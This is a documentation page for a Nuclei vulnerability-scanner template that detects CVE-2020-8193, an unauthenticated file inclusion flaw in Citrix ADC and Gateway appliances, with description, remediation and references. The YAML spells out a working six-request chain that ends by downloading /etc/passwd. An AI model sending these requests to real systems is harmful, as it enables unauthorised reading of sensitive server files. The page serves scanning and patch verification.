Skip to content
Nuclei Templates

Citrix - Local File Inclusion

ID: CVE-2020-8193

Severity: medium

Author: pdteam

Tags: cve2020,cve,citrix,lfi,kev,packetstorm

Description

Section titled “Description”

Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 are vulnerable to local file inclusion because they allow unauthenticated access to certain URL endpoints.

YAML Source

Section titled “YAML Source”
id: CVE-2020-8193


info:
  name: Citrix  - Local File Inclusion
  author: pdteam
  severity: medium
  description: Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 are vulnerable to local file inclusion because they allow unauthenticated access to certain URL endpoints.
  impact: |
    An attacker can access sensitive information stored on the server, potentially leading to further exploitation or unauthorized access.
  remediation: |
    Apply the latest security patches or updates provided by Citrix to fix the local file inclusion vulnerability.
  reference:
    - https://github.com/jas502n/CVE-2020-8193
    - http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html
    - https://support.citrix.com/article/CTX276688
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8193
    - https://github.com/0ps/pocassistdb
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2020-8193
    cwe-id: CWE-287,CWE-284
    epss-score: 0.97463
    epss-percentile: 0.99959
    cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 6
    vendor: citrix
    product: application_delivery_controller_firmware
  tags: cve2020,cve,citrix,lfi,kev,packetstorm


http:
  - raw:
      - |
        POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml
        X-NITRO-USER: xpyZxwy6
        X-NITRO-PASS: xWXHUJ56


        <appfwprofile><login></login></appfwprofile>
      - |
        GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /menu/neo HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /menu/stc HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml
        X-NITRO-USER: oY39DXzQ
        X-NITRO-PASS: ZuU9Y9c1
        rand_key: {{randkey}}


        <appfwprofile><login></login></appfwprofile>
      - |
        POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml
        X-NITRO-USER: oY39DXzQ
        X-NITRO-PASS: ZuU9Y9c1
        rand_key: {{randkey}}


        <clipermission></clipermission>


    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"


    extractors:
      - type: regex
        name: randkey # dynamic variable
        regex:
          - "(?m)[0-9]{3,10}\\.[0-9]+"
        internal: true
        part: body
# digest: 490a004630440220559221ae48a4ba1bc00c7e4c374d765978d04b297bec23f01b105ec01991e6d60220252af6cc2dbff1510dd4f4d3201ac9f503c767d908252f107387a75a010b4a80:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-8193.yaml"

View on Github